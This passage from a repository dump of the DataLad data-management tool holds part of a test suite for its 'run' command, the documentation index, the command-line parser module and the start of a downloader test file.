options=[\"--force\"])\n\n assert_in_results(\n ds.run(\"cd .> {}\".format(output_rel), outputs=[output_rel],\n result_renderer='disabled'),\n action=\"run.remove\", status=\"ok\")\n\n assert_repo_status(ds.path)\n\n # Remove still gets saved() if command doesn't generate the output (just as\n # it would if git-rm were used instead of unlink).\n repo.drop(output_rel, options=[\"--force\"])\n assert_in_results(\n ds.run(\"cd .> something-else\", outputs=[output_rel],\n result_renderer='disabled'),\n action=\"run.remove\", status=\"ok\")\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_reglob_outputs(path=None):\n ds = Dataset(path).create()\n repo = ds.repo\n (ds.pathobj / \"write_text.py\").write_text(\"\"\"\nimport sys\nassert len(sys.argv) == 2\nname = sys.argv[1]\nwith open(name + \".txt\", \"w\") as fh:\n fh.write(name)\n\"\"\")\n ds.save(to_git=True)\n cmd = [sys.executable, \"write_text.py\"]\n\n ds.run(cmd + [\"foo\"], outputs=[\"*.txt\"], expand=\"outputs\")\n assert_in(\"foo.txt\", last_commit_msg(repo))\n\n ds.run(cmd + [\"bar\"], outputs=[\"*.txt\"], explicit=True)\n ok_exists(str(ds.pathobj / \"bar.txt\"))\n assert_repo_status(ds.path)\n\n\n@with_tempfile(mkdir=True)\ndef test_run_unexpanded_placeholders(path=None):\n ds = Dataset(path).create()\n cmd = [sys.executable, \"-c\",\n \"import sys; open(sys.argv[1], 'w').write(' '.join(sys.argv[2:]))\"]\n\n # It's weird, but for lack of better options, inputs and outputs that don't\n # have matches are available unexpanded.\n\n with assert_raises(IncompleteResultsError):\n ds.run(cmd + [\"arg1\", \"{inputs}\"], inputs=[\"foo*\"],\n on_failure=\"continue\")\n assert_repo_status(ds.path)\n ok_file_has_content(op.join(path, \"arg1\"), \"foo*\")\n\n ds.run(cmd + [\"arg2\", \"{outputs}\"], outputs=[\"bar*\"])\n assert_repo_status(ds.path)\n ok_file_has_content(op.join(path, \"arg2\"), \"bar*\")\n\n ds.run(cmd + [\"arg3\", \"{outputs[1]}\"], outputs=[\"foo*\", \"bar\"])\n ok_file_has_content(op.join(path, \"arg3\"), \"bar\")\n\n\n@with_tempfile(mkdir=True)\ndef test_run_empty_repo(path=None):\n ds = 
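# --- Editor's illustrative aside, not part of the original test suite. ---
# Output globs, as shown above, are re-evaluated after the command finished,
# so files the command just created are matched and saved.  `ds` is a
# hypothetical clean dataset; the shell redirection assumes a POSIX shell.
def _demo_output_globs(ds):
    ds.run('echo hi > result.txt', outputs=['*.txt'], expand='outputs')
# --- end of aside ---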
Dataset(path).create()\n cmd = [sys.executable, \"-c\", \"open('foo', 'w').write('')\"]\n # Using \"*\" in a completely empty repo will fail.\n with assert_raises(IncompleteResultsError):\n ds.run(cmd, inputs=[\"*\"], on_failure=\"stop\")\n assert_repo_status(ds.path)\n # \".\" will work okay, though.\n assert_status(\"ok\", ds.run(cmd, inputs=[\".\"]))\n assert_repo_status(ds.path)\n ok_exists(str(ds.pathobj / \"foo\"))\n\n\n@with_tree(tree={\"foo\": \"f\", \"bar\": \"b\"})\ndef test_dry_run(path=None):\n ds = Dataset(path).create(force=True)\n\n # The dataset is reported as dirty, and the custom result render relays\n # that to the default renderer.\n with swallow_outputs() as cmo:\n with assert_raises(IncompleteResultsError):\n ds.run(\"blah \", dry_run=\"basic\")\n assert_in(\"run(impossible)\", cmo.out)\n assert_not_in(\"blah\", cmo.out)\n\n ds.save()\n\n # unknown dry-run mode\n assert_raises(ValueError, ds.run, 'blah', dry_run='absurd')\n\n with swallow_outputs() as cmo:\n ds.run(\"blah \", dry_run=\"basic\")\n assert_in(\"Dry run\", cmo.out)\n assert_in(\"location\", cmo.out)\n assert_in(\"blah\", cmo.out)\n assert_not_in(\"expanded inputs\", cmo.out)\n assert_not_in(\"expanded outputs\", cmo.out)\n\n with swallow_outputs() as cmo:\n ds.run(\"blah {inputs} {outputs}\", dry_run=\"basic\",\n inputs=[\"fo*\"], outputs=[\"b*r\"])\n assert_in(\n 'blah \"foo\" \"bar\"' if on_windows else \"blah foo bar\",\n cmo.out)\n assert_in(\"expanded inputs\", cmo.out)\n assert_in(\"['foo']\", cmo.out)\n assert_in(\"expanded outputs\", cmo.out)\n assert_in(\"['bar']\", cmo.out)\n\n # Just the command.\n with swallow_outputs() as cmo:\n ds.run(\"blah \", dry_run=\"command\")\n assert_not_in(\"Dry run\", cmo.out)\n assert_in(\"blah\", cmo.out)\n assert_not_in(\"inputs\", cmo.out)\n\n # The output file wasn't unlocked.\n assert_repo_status(ds.path)\n\n # Subdaset handling\n\n subds = ds.create(\"sub\")\n (subds.pathobj / \"baz\").write_text(\"z\")\n ds.save(recursive=True)\n\n # If a subdataset is installed, it works as usual.\n with swallow_outputs() as cmo:\n ds.run(\"blah {inputs}\", dry_run=\"basic\", inputs=[\"sub/b*\"])\n assert_in(\n 'blah \"sub\\\\baz\"' if on_windows else 'blah sub/baz',\n cmo.out)\n\n # However, a dry run will not do the install/reglob procedure.\n ds.drop(\"sub\", what='all', reckless='kill', recursive=True)\n with swallow_outputs() as cmo:\n ds.run(\"blah {inputs}\", dry_run=\"basic\", inputs=[\"sub/b*\"])\n assert_in(\"sub/b*\", cmo.out)\n assert_not_in(\"baz\", cmo.out)\n\n\n@with_tree(tree={OBSCURE_FILENAME + \".t\": \"obscure\",\n \"normal.txt\": \"normal\"})\ndef test_io_substitution(path=None):\n files = [OBSCURE_FILENAME + \".t\", \"normal.txt\"]\n ds = Dataset(path).create(force=True)\n ds.save()\n # prefix the content of any given file with 'mod::'\n cmd = \"import sys; from pathlib import Path; t = [(Path(p), 'mod::' + Path(p).read_text()) for p in sys.argv[1:]]; [k.write_text(v) for k, v in t]\"\n cmd_str = \"{} -c \\\"{}\\\" {{inputs}}\".format(sys.executable, cmd)\n # this should run and not crash with permission denied\n ds.run(cmd_str, inputs=[\"{outputs}\"], outputs=[\"*.t*\"],\n result_renderer='disabled')\n # all filecontent got the prefix\n for f in files:\n ok_((ds.pathobj / f).read_text().startswith('mod::'))\n\n # we could just ds.rerun() now, and it should work, but this would make\n # rerun be a dependency of a core test\n # instead just double-run, but with a non-list input-spec.\n # should have same outcome\n ds.run(cmd_str, inputs=\"{outputs}\", 
outputs=\"*.t*\",\n result_renderer='disabled')\n for f in files:\n ok_((ds.pathobj / f).read_text().startswith('mod::mod::'))\n\n\ndef test_format_iospecs():\n seq = ['one', 'two']\n eq_(seq, _format_iospecs(['{dummy}'], dummy=seq))\n # garbage when combined with longer spec-sequences\n # but this is unavoidable without introducing a whitelist\n # of supported value types -- which would limit flexibility\n eq_([\"['one', 'two']\", 'other'],\n _format_iospecs(['{dummy}', 'other'], dummy=seq))\n\n\ndef test_substitution_config():\n # use a shim to avoid having to create an actual dataset\n # the tested function only needs a `ds.config` to be a ConfigManager\n from datalad import cfg\n\n class dset:\n config = cfg\n\n # empty be default\n eq_(_get_substitutions(dset), {})\n # basic access\n with patch_config({\"datalad.run.substitutions.dummy\": 'ork'}):\n eq_(_get_substitutions(dset), dict(dummy='ork'))\n # can report multi-value\n with patch_config({\"datalad.run.substitutions.dummy\": ['a', 'b']}):\n eq_(_get_substitutions(dset), dict(dummy=['a', 'b']))\n\n # verify combo with iospec formatting\n eq_(_format_iospecs(['{dummy}'],\n **_get_substitutions(dset)),\n ['a', 'b'])\n" }, { "alpha_fraction": 0.7093862891197205, "alphanum_fraction": 0.7129963636398315, "avg_line_length": 31.58823585510254, "blob_id": "33a294ab0185f02155de3e3303344f48719cd4c7", "content_id": "6a99e51ae803a30b505b3c72b7e460bb01ca5c5c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2216, "license_type": "permissive", "max_line_length": 131, "num_lines": 68, "path": "/docs/source/index.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "DataLad |---| data management and publication multitool\n*******************************************************\n\nWelcome to DataLad's **technical documentation**. Information here is targeting\nsoftware developers and is focused on the Python API and :term:`CLI`, as well\nas software design, employed technologies, and key features. Comprehensive\n**user documentation** with information on installation, basic operation,\nsupport, and (advanced) use case descriptions is available in the `DataLad\nhandbook <http://handbook.datalad.org>`_.\n\nContent\n^^^^^^^\n\n.. toctree::\n :maxdepth: 1\n\n changelog\n acknowledgements\n publications\n\nConcepts and technologies\n=========================\n\n.. toctree::\n :maxdepth: 2\n\n background\n related\n basics\n credentials\n customization\n design/index\n glossary\n\nCommands and API\n================\n\n.. toctree::\n :maxdepth: 2\n\n cmdline\n modref\n config\n\nExtension packages\n==================\n\nDataLad can be customized and additional functionality can be integrated via\nextensions. 
Each extension provides its own documentation:\n\n- `Crawling web resources and automated data distributions <http://docs.datalad.org/projects/crawler>`_\n- `Neuroimaging data and workflows <http://docs.datalad.org/projects/neuroimaging>`_\n- `Containerized computational environments <http://docs.datalad.org/projects/container>`_\n- `Advanced metadata tooling with JSON-LD reporting and additional metadata extractors <http://docs.datalad.org/projects/metalad>`_\n- `Staged additions, performance and user experience improvements for DataLad <http://docs.datalad.org/projects/next>`_\n- `Resources for working with the UKBiobank as a DataLad dataset <http://docs.datalad.org/projects/ukbiobank>`_\n- `Deposit and retrieve DataLad datasets via the Open Science Framework <http://docs.datalad.org/projects/osf>`_\n- `Functionality that has been phased out of the core package <http://docs.datalad.org/projects/deprecated>`_\n- `Special interest functionality or drafts of future additions to DataLad proper <http://docs.datalad.org/projects/mihextras>`_\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n\n.. |---| unicode:: U+02014 .. em dash\n" }, { "alpha_fraction": 0.6223336458206177, "alphanum_fraction": 0.6250462532043457, "avg_line_length": 39.15016555786133, "blob_id": "9b39861ef5932b3ade87eda32c39f765743ec9d7", "content_id": "b3c44026ca29644c749a1e625e9385a3b3a598ea", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24331, "license_type": "permissive", "max_line_length": 79, "num_lines": 606, "path": "/datalad/cli/parser.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Components to build the parser instance for the CLI\n\nThis module must import (and run) really fast for a responsive CLI.\nIt is unconditionally imported by the main() entrypoint.\n\"\"\"\n\n# ATTN!\n# All top-imports are limited to functionality that is necessary for the\n# non-error case of constructing of a single target command parser only.\n# For speed reasons, all other imports necessary for special cases,\n# like error handling, must be done conditionally in-line.\n\nimport argparse\nimport logging\nimport sys\nfrom collections import defaultdict\nfrom functools import partial\n\nfrom datalad import __version__\nfrom datalad.interface.base import (\n get_cmd_doc,\n get_interface_groups,\n is_api_arg,\n load_interface,\n)\nfrom datalad.support.constraints import EnsureChoice\nfrom datalad.utils import getargspec\n\nfrom .common_args import common_args\nfrom .exec import call_from_parser\nfrom .helpers import get_commands_from_groups\nfrom .interface import (\n alter_interface_docs_for_cmdline,\n get_cmd_ex,\n get_cmdline_command_name,\n)\n\n# special case imports\n# .helpers import add_entrypoints_to_interface_groups\n# .helpers.get_description_with_cmd_summary\n# .helpers.get_commands_from_groups\n# .utils.get_suggestions_msg,\n# .interface._known_extension_commands\n# .interface._deprecated_commands\n\nlgr = logging.getLogger('datalad.cli.parser')\n\n\nhelp_gist = \"\"\"\\\nComprehensive data management solution\n\nDataLad provides a unified data distribution system built on the Git\nand Git-annex. DataLad command line tools allow to manipulate (obtain,\ncreate, update, publish, etc.) datasets and provide a comprehensive\ntoolbox for joint management of data and code. 
Compared to Git/annex\nit primarily extends their functionality to transparently and\nsimultaneously work with multiple inter-related repositories.\"\"\"\n\n\n# TODO: OPT look into making setup_parser smarter to become faster\n# Now it seems to take up to 200ms to do all the parser setup\n# even though it might not be necessary to know about all the commands etc.\n# I wondered if it could somehow decide on what commands to worry about etc\n# by going through sys.args first\ndef setup_parser(\n cmdlineargs,\n formatter_class=argparse.RawDescriptionHelpFormatter,\n return_subparsers=False,\n completing=False,\n help_ignore_extensions=False):\n \"\"\"\n The holy grail of establishing CLI for DataLad's Interfaces\n\n Parameters\n ----------\n cmdlineargs: sys.argv\n Used to make some shortcuts when construction of a full parser can be\n avoided.\n formatter_class:\n Passed to argparse\n return_subparsers: bool, optional\n is used ATM only by BuildManPage in _datalad_build_support\n completing: bool, optional\n Flag to indicate whether the process was invoked by argcomplete\n help_ignore_extensions: bool, optional\n Prevent loading of extension entrypoints when --help is requested.\n This is enabled when building docs to avoid pollution of generated\n manpages with extensions commands (that should appear in their own\n docs, but not in the core datalad package docs)\n \"\"\"\n lgr.log(5, \"Starting to setup_parser\")\n\n # main parser\n parser = ArgumentParserDisableAbbrev(\n fromfile_prefix_chars=None,\n prog='datalad',\n # usage=\"%(prog)s ...\",\n description=help_gist,\n formatter_class=formatter_class,\n add_help=False,\n # TODO: when dropping support for Python 3.8: uncomment below\n # and use parse_known_args instead of _parse_known_args:\n # # set to False so parse_known_args does not add its error handling\n # # Added while RFing from using _parse_known_args to parse_known_args.\n # exit_on_error=False,\n )\n\n # common options\n parser_add_common_options(parser)\n\n # get all interface definitions from datalad-core\n interface_groups = get_interface_groups()\n\n # try to figure out whether the parser construction can be limited to\n # a single (sub)command -- don't even try to do this, when we are in\n # any of the doc-building capacities -- timing is not relevant there\n status, parseinfo = single_subparser_possible(\n cmdlineargs,\n parser,\n completing,\n ) if not return_subparsers else ('allparsers', None)\n\n command_provider = 'core'\n\n if status == 'allparsers' and not help_ignore_extensions:\n from .helpers import add_entrypoints_to_interface_groups\n add_entrypoints_to_interface_groups(interface_groups)\n\n # when completing and we have no incomplete option or parameter\n # we still need to offer all commands for completion\n if (completing and status == 'allknown') or (\n status == 'subcommand' and parseinfo not in\n get_commands_from_groups(interface_groups)):\n # we know the command is not in the core package\n # still a chance it could be in an extension\n command_provider = 'extension'\n # we need the full help, or we have a potential command that\n # lives in an extension, must load all extension, expensive\n from .helpers import add_entrypoints_to_interface_groups\n\n # need to load all the extensions and try again\n # TODO load extensions one-by-one and stop when a command was found\n add_entrypoints_to_interface_groups(interface_groups)\n\n if status == 'subcommand':\n known_commands = get_commands_from_groups(interface_groups)\n if parseinfo not in 
known_commands:\n # certainly not possible to identify a single parser that\n # could be constructed, but we can be helpful\n # will sys.exit() unless we are completing\n try_suggest_extension_with_command(\n parser, parseinfo, completing, known_commands)\n # in completion mode we can get here, even for a command\n # that does not exist at all!\n command_provider = None\n\n # TODO check if not needed elsewhere\n if status == 'help' or completing and status in ('allknown', 'unknownopt'):\n # --help specification was delayed since it causes immediate\n # printout of\n # --help output before we setup --help for each command\n parser_add_common_opt(parser, 'help')\n\n all_parsers = {} # name: (sub)parser\n\n if (completing and status == 'allknown') or status \\\n in ('allparsers', 'subcommand', 'error'):\n # parseinfo could be None here, when we could not identify\n # a subcommand, but need to locate matching ones for\n # completion\n # create subparser, use module suffix as cmd name\n subparsers = parser.add_subparsers()\n for _, _, _interfaces \\\n in sorted(interface_groups, key=lambda x: x[1]):\n for _intfspec in _interfaces:\n cmd_name = get_cmdline_command_name(_intfspec)\n if status == 'subcommand':\n # in case only a subcommand is desired, we could\n # skip some processing\n if command_provider and cmd_name != parseinfo:\n # a known command, but know what we are looking for\n continue\n if command_provider is None and not cmd_name.startswith(\n parseinfo):\n # an unknown command, and has no common prefix with\n # the current command candidate, not even good\n # for completion\n continue\n subparser = add_subparser(\n _intfspec,\n subparsers,\n cmd_name,\n formatter_class,\n completing=completing,\n )\n if subparser: # interface can fail to load\n all_parsers[cmd_name] = subparser\n\n # \"main\" parser is under \"datalad\" name\n all_parsers['datalad'] = parser\n lgr.log(5, \"Finished setup_parser\")\n if return_subparsers:\n # TODO why not pull the subparsers from the main parser?\n return all_parsers\n else:\n return parser\n\n\ndef setup_parser_for_interface(parser, cls, completing=False):\n # XXX needs safety check for name collisions\n # XXX allow for parser kwargs customization\n # get the signature, order of arguments is taken from it\n ndefaults = 0\n args, varargs, varkw, defaults = getargspec(\n cls.__call__, include_kwonlyargs=True)\n if defaults is not None:\n ndefaults = len(defaults)\n default_offset = ndefaults - len(args)\n prefix_chars = parser.prefix_chars\n for i, arg in enumerate(args):\n if not is_api_arg(arg):\n continue\n\n param = cls._params_[arg]\n defaults_idx = default_offset + i\n if param.cmd_args == tuple():\n # explicitly provided an empty sequence of argument names\n # this shall not appear in the parser\n continue\n\n # set up the parameter\n setup_parserarg_for_interface(\n parser, arg, param, defaults_idx, prefix_chars, defaults,\n completing=completing)\n\n\ndef setup_parserarg_for_interface(parser, param_name, param, defaults_idx,\n prefix_chars, defaults, completing=False):\n cmd_args = param.cmd_args\n parser_kwargs = param.cmd_kwargs\n has_default = defaults_idx >= 0\n if cmd_args:\n if cmd_args[0][0] in prefix_chars:\n # TODO: All the Parameter(args=...) values in this code\n # base use hyphens, so there is no point in the below\n # conversion. 
If it looks like no extensions rely on this\n # behavior either, this could be dropped.\n parser_args = [c.replace('_', '-') for c in cmd_args]\n else:\n # Argparse will not convert dashes to underscores for\n # arguments that don't start with a prefix character, so\n # the above substitution must be avoided so that\n # call_from_parser() can find the corresponding parameter.\n parser_args = cmd_args\n elif has_default:\n # Construct the option from the Python parameter name.\n parser_args = (\"--{}\".format(param_name.replace(\"_\", \"-\")),)\n else:\n # If args= wasn't given and its a positional argument in the\n # function, add a positional argument to argparse. If `dest` is\n # specified, we need to remove it from the keyword arguments\n # because add_argument() expects it as the first argument. Note\n # that `arg` shouldn't have a dash here, but `metavar` can be\n # used if a dash is preferred for the command-line help.\n parser_args = (parser_kwargs.pop(\"dest\", param_name),)\n\n if has_default:\n parser_kwargs['default'] = defaults[defaults_idx]\n if param.constraints is not None:\n parser_kwargs['type'] = param.constraints\n if completing:\n help = None\n # if possible, define choices to enable their completion\n if 'choices' not in parser_kwargs and \\\n isinstance(param.constraints, EnsureChoice):\n parser_kwargs['choices'] = [\n c for c in param.constraints._allowed if c is not None]\n else:\n help = _amend_param_parser_kwargs_for_help(\n parser_kwargs, param,\n defaults[defaults_idx] if defaults_idx >= 0 else None)\n # create the parameter, using the constraint instance for type\n # conversion\n parser.add_argument(*parser_args, help=help,\n **parser_kwargs)\n\n\ndef _amend_param_parser_kwargs_for_help(parser_kwargs, param, default=None):\n if 'metavar' not in parser_kwargs and \\\n isinstance(param.constraints, EnsureChoice):\n parser_kwargs['metavar'] = \\\n '{%s}' % '|'.join(\n # don't use short_description(), because\n # it also needs to give valid output for\n # Python syntax (quotes...), but here we\n # can simplify to shell syntax where everything\n # is a string\n p for p in param.constraints._allowed\n # in the cmdline None pretty much means\n # don't give the options, so listing it\n # doesn't make sense. 
Moreover, any non-string\n # value cannot be given and very likely only\n # serves a special purpose in the Python API\n # or implementation details\n if isinstance(p, str))\n help = alter_interface_docs_for_cmdline(param._doc)\n if help:\n help = help.rstrip()\n if help[-1] != '.':\n help += '.'\n if param.constraints is not None:\n help += _get_help_for_parameter_constraint(param)\n if default is not None and \\\n not parser_kwargs.get('action', '').startswith('store_'):\n # if it is a flag, in commandline it makes little sense to show\n # showing the Default: (likely boolean).\n # See https://github.com/datalad/datalad/issues/3203\n help += \" [Default: %r]\" % (default,)\n return help\n\n\ndef _get_help_for_parameter_constraint(param):\n # include value constraint description and default\n # into the help string\n cdoc = alter_interface_docs_for_cmdline(\n param.constraints.long_description())\n if cdoc[0] == '(' and cdoc[-1] == ')':\n cdoc = cdoc[1:-1]\n return ' Constraints: %s' % cdoc\n\n\ndef single_subparser_possible(cmdlineargs, parser, completing):\n \"\"\"Performs early analysis of the cmdline\n\n Looks at the first unparsed argument and if a known command,\n would return only that one.\n\n When a plain command invocation with `--version` is detected, it will be\n acted on directly (until sys.exit(0) to avoid wasting time on unnecessary\n further processing.\n\n Returns\n -------\n {'error', 'allknown', 'help', 'unknownopt', 'subcommand'}, None or str\n Returns a status label and a parameter for this status.\n 'error': parsing failed, 'allknown': the parser successfully\n identified all arguments, 'help': a help request option was found,\n 'unknownopt': an unknown or incomplete option was found,\n 'subcommand': a potential subcommand name was found. For the latter\n two modes the second return value is the option or command name.\n For all other modes the second return value is None.\n \"\"\"\n # Before doing anything additional and possibly expensive see may be that\n # we have got the command already\n try:\n parsed_args, unparsed_args = parser._parse_known_args(\n cmdlineargs[1:], argparse.Namespace())\n # before anything handle possible datalad --version\n if not unparsed_args and getattr(parsed_args, 'version', None):\n parsed_args.version() # will exit with 0\n if not (completing or unparsed_args):\n # there was nothing that could be a command\n fail_with_short_help(\n parser,\n msg=\"too few arguments, \"\n \"run with --help or visit https://handbook.datalad.org\",\n exit_code=2)\n lgr.debug(\"Command line args 1st pass for DataLad %s. \"\n \"Parsed: %s Unparsed: %s\",\n __version__, parsed_args, unparsed_args)\n except Exception as exc:\n # this did not work out\n from datalad.support.exceptions import CapturedException\n ce = CapturedException(exc)\n lgr.debug(\"Early parsing failed with %s\", ce)\n return 'error', None\n\n if not unparsed_args:\n # cannot possibly be a subcommand\n return 'allknown', None\n\n unparsed_arg = unparsed_args[0]\n\n # First unparsed could be either unknown option to top level \"datalad\"\n # or a command. 
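    # For example, "datalad --nosuchopt ..." leaves the unknown option
    # "--nosuchopt" unparsed, while "datalad status" leaves the (potential)
    # subcommand name "status" unparsed; the checks below distinguish the two
    # by whether the first unparsed token starts with a prefix character.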
Among unknown could be --help/--help-np which would\n # need to be dealt with\n if unparsed_arg in ('--help', '--help-np', '-h'):\n # not need to try to tune things, all these will result in everything\n # to be imported and parsed\n return 'help', None\n elif unparsed_arg.startswith('-'): # unknown or incomplete option\n if completing:\n return 'unknownopt', unparsed_arg\n # will sys.exit\n fail_with_short_help(parser,\n msg=f\"unrecognized argument {unparsed_arg}\",\n # matches exit code of InsufficientArgumentsError\n exit_code=2)\n else: # potential command to handle\n return 'subcommand', unparsed_arg\n\n\ndef try_suggest_extension_with_command(parser, cmd, completing, known_cmds):\n \"\"\"If completing=False, this function will trigger sys.exit()\"\"\"\n # check if might be coming from known extensions\n from .interface import (\n _deprecated_commands,\n _known_extension_commands,\n )\n extension_commands = {\n c: e\n for e, commands in _known_extension_commands.items()\n for c in commands\n }\n hint = None\n if cmd in extension_commands:\n hint = \"Command %s is provided by (not installed) extension %s.\" \\\n % (cmd, extension_commands[cmd])\n elif cmd in _deprecated_commands:\n hint_cmd = _deprecated_commands[cmd]\n hint = \"Command %r was deprecated\" % cmd\n hint += (\" in favor of %r command.\" % hint_cmd) if hint_cmd else '.'\n if not completing:\n fail_with_short_help(\n parser,\n hint=hint,\n provided=cmd,\n known=list(known_cmds.keys()) + list(extension_commands.keys())\n )\n\n\ndef add_subparser(_intfspec, subparsers, cmd_name, formatter_class,\n completing=False):\n \"\"\"Given an interface spec, add a subparser to subparsers under cmd_name\n \"\"\"\n _intf = load_interface(_intfspec)\n if _intf is None:\n # failed to load, error was already logged\n return\n\n # compose argparse.add_parser() arguments, focused on docs\n parser_args = dict(formatter_class=formatter_class)\n # use class description, if no explicit description is available\n intf_doc = get_cmd_doc(_intf)\n if not completing:\n parser_args['description'] = alter_interface_docs_for_cmdline(\n intf_doc)\n if hasattr(_intf, '_examples_'):\n intf_ex = alter_interface_docs_for_cmdline(get_cmd_ex(_intf))\n parser_args['description'] += intf_ex\n\n # create the sub-parser\n subparser = subparsers.add_parser(cmd_name, add_help=False, **parser_args)\n # our own custom help for all commands, we must do it here\n # (not in setup_parser_for_interface()) because the top-level parser must\n # not unconditionally have it available initially\n parser_add_common_opt(subparser, 'help')\n # let module configure the parser\n setup_parser_for_interface(subparser, _intf, completing=completing)\n # and we would add custom handler for --version\n parser_add_version_opt(\n subparser, _intf.__module__.split('.', 1)[0], include_name=True)\n # logger for command\n # configure 'run' function for this command\n plumbing_args = dict(\n # this is the key execution handler\n func=partial(call_from_parser, _intf),\n # use the logger of the module that defined the interface\n logger=logging.getLogger(_intf.__module__),\n subparser=subparser)\n if hasattr(_intf, 'result_renderer_cmdline'):\n plumbing_args['result_renderer'] = _intf.result_renderer_cmdline\n subparser.set_defaults(**plumbing_args)\n return subparser\n\n\nclass ArgumentParserDisableAbbrev(argparse.ArgumentParser):\n # Don't accept abbreviations for long options. 
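    # (E.g. an abbreviated "--vers" must not be silently expanded to
    # "--version"; only fully spelled-out long options are matched.)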
This kludge was originally\n # added at a time when our minimum required Python version was below 3.5,\n # preventing us from using allow_abbrev=False. Now our minimum Python\n # version is high enough, but we still can't use allow_abbrev=False because\n # it suffers from the problem described in 6b3f2fffe (BF: cmdline: Restore\n # handling of short options, 2018-07-23).\n #\n # Modified from the solution posted at\n # https://bugs.python.org/issue14910#msg204678\n def _get_option_tuples(self, option_string):\n chars = self.prefix_chars\n if option_string[0] in chars and option_string[1] in chars:\n # option_string is a long flag. Disable abbreviation.\n return []\n return super(ArgumentParserDisableAbbrev, self)._get_option_tuples(\n option_string)\n\n\ndef parser_add_common_opt(parser, opt, names=None, **kwargs):\n opt_tmpl = common_args[opt]\n opt_kwargs = opt_tmpl[1].copy()\n opt_kwargs.update(kwargs)\n if names is None:\n parser.add_argument(*opt_tmpl[0], **opt_kwargs)\n else:\n parser.add_argument(*names, **opt_kwargs)\n\n\ndef parser_add_common_options(parser, version=None):\n \"\"\"Add all options defined in common_args, but excludes 'help'\"\"\"\n # populate with standard options\n for arg in common_args:\n if arg == 'help':\n continue\n parser_add_common_opt(parser, arg)\n # special case version arg\n if version is not None:\n import warnings\n warnings.warn(\"Passing 'version' to parser_add_common_options \"\n \"no longer has an effect \"\n \"and will be removed in a future release.\",\n DeprecationWarning)\n parser_add_version_opt(parser, 'datalad', include_name=True, delay=True)\n\n\ndef parser_add_version_opt(parser, mod_name, include_name=False, delay=False):\n \"\"\"Setup --version option\n\n Parameters\n ----------\n parser:\n mod_name: str, optional\n include_name: bool, optional\n delay: bool, optional\n If set to True, no action is taken immediately, and rather\n we assign the function which would print the version. 
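        (When eventually invoked, the stored callable prints the version and
        exits with status 0.)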
Necessary for\n early pre-parsing of the cmdline\n \"\"\"\n\n def print_version():\n mod = sys.modules.get(mod_name, None)\n version = getattr(mod, '__version__', None)\n if version is None:\n # Let's use the standard Python mechanism if underlying module\n # did not provide __version__\n try:\n if sys.version_info < (3, 10):\n import importlib_metadata as im\n else:\n import importlib.metadata as im\n\n pkg = im.packages_distributions()[mod_name][0]\n version = im.version(pkg)\n except Exception:\n version = \"unknown\"\n if include_name:\n print(\"%s %s\" % (mod_name, version))\n else:\n print(version)\n sys.exit(0)\n\n class versionAction(argparse.Action):\n def __call__(self, parser, args, values, option_string=None):\n if delay:\n setattr(args, self.dest, print_version)\n else:\n print_version()\n\n parser.add_argument(\n \"--version\",\n nargs=0,\n action=versionAction,\n help=(\n \"show the program's version\"\n if not mod_name\n else \"show the module and its version which provides the command\")\n )\n\n\ndef fail_with_short_help(parser=None,\n msg=None,\n known=None, provided=None,\n hint=None,\n exit_code=1,\n what=\"command\",\n out=None):\n \"\"\"Generic helper to fail\n with short help possibly hinting on what was intended if `known`\n were provided\n \"\"\"\n out = out or sys.stderr\n if msg:\n out.write(\"error: %s\\n\" % msg)\n if not known:\n if parser:\n parser_add_common_opt(parser, 'help')\n # just to appear in print_usage also consistent with --help output\n parser.add_argument(\"command [command-opts]\")\n parser.print_usage(file=out)\n else:\n out.write(\n \"datalad: Unknown %s %r. See 'datalad --help'.\\n\\n\"\n % (what, provided,))\n if provided not in known:\n from datalad.utils import get_suggestions_msg\n out.write(get_suggestions_msg(provided, known))\n if hint:\n out.write(\"Hint: %s\\n\" % hint)\n raise SystemExit(exit_code)\n" }, { "alpha_fraction": 0.5875251293182373, "alphanum_fraction": 0.5900402665138245, "avg_line_length": 30.55555534362793, "blob_id": "3a9cb38862607f87ab7c88fc6656034dd069b011", "content_id": "5f7084ca07d564c00cc8cbb366feb87b7fefe3c1", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1988, "license_type": "permissive", "max_line_length": 87, "num_lines": 63, "path": "/datalad/downloaders/tests/test_shub.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for shub:// downloader\"\"\"\n\nfrom datalad.downloaders.shub import SHubDownloader\nfrom datalad.support.exceptions import DownloadError\nfrom datalad.tests.utils_pytest import (\n assert_raises,\n ok_file_has_content,\n serve_path_via_http,\n with_tempfile,\n)\nfrom datalad.utils import (\n Path,\n create_tree,\n)\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_downloader_bad_query(urlpath=None, url=None):\n downloader = SHubDownloader()\n downloader.api_url = url\n with assert_raises(DownloadError):\n downloader.download(\"shub://org/repo\", urlpath)\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_downloader_bad_json(urlpath=None, url=None):\n downloader = 
